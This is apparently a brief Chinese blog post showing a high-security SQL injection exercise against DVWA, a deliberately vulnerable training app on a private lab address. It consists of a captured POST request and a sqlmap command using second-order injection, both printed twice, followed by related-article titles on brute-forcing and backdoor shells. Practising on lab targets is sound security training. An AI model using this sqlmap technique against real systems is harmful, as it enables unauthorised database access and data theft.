dvwa sql 注入高级
2016-07-07 17:19
423 查看
cat sqli.txt
POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1
Host: 172.19.180.27
Proxy-Connection: keep-alive
Content-Length: 19
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0
.8
Origin: http://172.19.180.27
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://172.19.180.27/dvwa/vulnerabilities/sqli/session-input.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: security=high; PHPSESSID=amh7ni5q8215gfj2dkgbt0b1j0
id=a&Submit=Submit
./sqlmap.py -r sqli.txt --second-order "http://172.19.180.27/dvwa/vulnerabilities/sqli/" --string "Surname"
POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1
Host: 172.19.180.27
Proxy-Connection: keep-alive
Content-Length: 19
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0
.8
Origin: http://172.19.180.27
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://172.19.180.27/dvwa/vulnerabilities/sqli/session-input.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: security=high; PHPSESSID=amh7ni5q8215gfj2dkgbt0b1j0
id=a&Submit=Submit
./sqlmap.py -r sqli.txt --second-order "http://172.19.180.27/dvwa/vulnerabilities/sqli/" --string "Surname"
相关文章推荐
- 接口解读:你的姓名+身份证号撑起了超11亿元市场规模,你造吗?
- 阿里云这群疯子
- 表格高级使用技巧_把表格进行到底(必看)
- dvwa+xampp搭建显示乱码的问题及解决方案
- MyBatis高级映射学习教程
- 高级cocos2d-x招聘面试试题参考
- JavaScript高级之词法作用域和作用域链
- JavaScript高级之函数的四种调用形式
- sql injection note day01
- Brute Force hydra dvwa
- 6、JavaScript高级之继承一(原型链)
- 5、JavaScript高级之私有属性
- 4、JavaScript高级之闭包
- 3、JavaScript高级之匿名函数
- Android点击应用Icon发生了什么
- hydra dvwa brute force password
- dvwa csrf
- dvwa --Upload and use C99.php Backdoor shell
- DVWA-WooYun SQL Injection
- 【巧设代理服务器 让IP地址藏起来】